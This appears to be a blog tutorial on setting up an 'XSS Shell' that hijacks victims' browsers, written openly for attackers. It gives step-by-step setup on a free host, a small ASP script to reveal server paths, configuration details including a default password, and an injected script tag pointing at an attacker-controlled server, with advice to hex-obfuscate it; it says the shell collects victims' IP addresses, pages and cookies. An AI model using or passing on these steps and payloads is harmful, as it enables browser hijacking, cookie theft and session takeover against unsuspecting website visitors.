How to upload Shell through XSS

Hello and welcome back to Advanced XSS.Today I will be covering the XSS Shell.An XSS Shell gives the attacker full control over the victims
browser.The shell works inside an iframe environment.This allows the attacker to keep control of the victims browser even if the slave is
browsing to new pages etc...The Shell also gets the victims ip,current html page, and of course cookies.It basically allows the attacker to
execute virtually anything in javascript.

First, download the shell from SourceForce.Then make a free hosting account on 7Host. Now, you will need to know the location of the database.To accomplish this we will use a .asp command to retrieve the database path.Make a file called "GetDB.asp" and put the following code in.

CODE
<%

Response.Write Server.MapPath(".")

%>

Now upload all the files inside the xssshell folder to 7host to your 7Host account.I used Filezilla but, then I started having trouble so, I
started using the FlashFXP free trial.Once done uploading view the GetDB.asp in your browser.It will show the Database location.Now open
the xssshell.asp in notepad or notepad++.Change the var = SERVER value to the valid URL of your server.Now open the admin/db.asp file and edit
the DBPATH to the database path you found inside the GetDB.asp file and add the location of shell.mdb to the end.

Example:- DBPATH = "D:\user5\your_username\xssshell\db\shell.mdb"

Also change the password value to your liking.This can be found in the "If Trim(Pass)" variable.

Note: Default password is w00t.

Now, to edit the sample slave.Open /sample_victim/default.asp and edit the script src to the location of your xssshell.asp file.

Example:- <script src=http://yoursite.com/xssshell/xssshell.asp></script>

You may disguise the script using hexing described in previous lessons (previous lessons listed at the bottom).

Congarts!You have just setup a XSS Shell.

12 comments:

Snow-Falling-Effect